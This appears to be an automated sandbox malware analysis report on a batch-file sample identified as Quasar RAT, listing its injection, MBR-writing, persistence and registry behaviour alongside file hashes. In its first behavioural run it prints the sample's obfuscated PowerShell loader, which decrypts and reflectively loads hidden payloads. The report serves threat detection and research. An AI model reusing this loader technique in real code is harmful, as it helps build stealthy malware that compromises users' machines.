Malware Analysis Report

2024-08-06 11:40

Sample ID 240612-kr7l8awgnm
Target Shadow-Stealer.bat
SHA256 84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
Tags
quasar v2.2.6 | tinsler bootkit persistence spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724

Threat Level: Known bad

The file Shadow-Stealer.bat was found to be: Known bad.

Malicious Activity Summary

quasar v2.2.6 | tinsler bootkit persistence spyware trojan

Suspicious use of NtCreateProcessExOtherParentProcess

Quasar payload

Quasar RAT

Suspicious use of NtCreateUserProcessOtherParentProcess

Sets service image path in registry

Deletes itself

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Checks BIOS information in registry

Enumerates connected drives

Writes to the Master Boot Record (MBR)

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Runs ping.exe

Modifies registry class

Modifies data under HKEY_USERS

Views/modifies file attributes

Suspicious use of UnmapMainImage

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Pre-OS Boot
T1542
Bootkit
T1542.003
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Modify Registry
T1112
Pre-OS Boot
T1542
Bootkit
T1542.003
Hide Artifacts
T1564
Hidden Files and Directories
T1564.001
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Peripheral Device Discovery
T1120
Remote System Discovery
T1018
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-12 08:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 08:51

Reported

2024-06-12 08:53

Platform

win7-20240611-en

Max time kernel

119s

Max time network

120s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2204 wrote to memory of 1912 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
PID 2204 wrote to memory of 1912 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
PID 2204 wrote to memory of 1912 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat"

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/1912-5-0x000007FEF5ABE000-0x000007FEF5ABF000-memory.dmp

memory/1912-6-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

memory/1912-7-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

memory/1912-11-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

memory/1912-10-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

memory/1912-9-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

memory/1912-8-0x00000000026B0000-0x00000000026B8000-memory.dmp

memory/1912-12-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

memory/1912-13-0x000007FEF5800000-0x000007FEF619D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 08:51

Reported

2024-06-12 08:53

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

144s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 6020 created 5768 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\dllhost.exe
PID 5268 created 1936 N/A C:\Windows\system32\WerFault.exe C:\Windows\System32\dllhost.exe
PID 5604 created 3524 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\dllhost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5080 created 612 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\system32\winlogon.exe
PID 4412 created 612 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\winlogon.exe
PID 4412 created 612 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\winlogon.exe
PID 5080 created 612 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\system32\winlogon.exe
PID 4412 created 612 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\winlogon.exe
PID 4412 created 612 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\winlogon.exe
PID 5964 created 5768 N/A C:\Windows\System32\svchost.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 created 612 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\winlogon.exe
PID 5964 created 1936 N/A C:\Windows\System32\svchost.exe C:\Windows\System32\dllhost.exe
PID 4412 created 612 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\winlogon.exe
PID 4412 created 612 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\winlogon.exe
PID 5964 created 3524 N/A C:\Windows\System32\svchost.exe C:\Windows\SysWOW64\dllhost.exe

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" C:\Windows\System32\WaaSMedicAgent.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\$sxr-mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Windows\$sxr-mshta.exe N/A
N/A N/A C:\Windows\$sxr-cmd.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\System32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5080 set thread context of 2400 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5080 set thread context of 3284 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 set thread context of 4304 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 set thread context of 4836 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 set thread context of 2968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 set thread context of 4308 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 5080 set thread context of 3004 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5080 set thread context of 756 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 set thread context of 5732 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 set thread context of 6028 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 set thread context of 4064 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 set thread context of 5768 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 set thread context of 1936 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 set thread context of 5780 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 set thread context of 2128 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 set thread context of 1160 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 set thread context of 2708 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 set thread context of 3524 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm C:\Windows\system32\svchost.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\dllhost.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\dllhost.exe

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E3FB4E05F" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd02f668-4eb7-4b85 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6757ba16-a8c2-4a4f C:\Windows\System32\RuntimeBroker.exe N/A
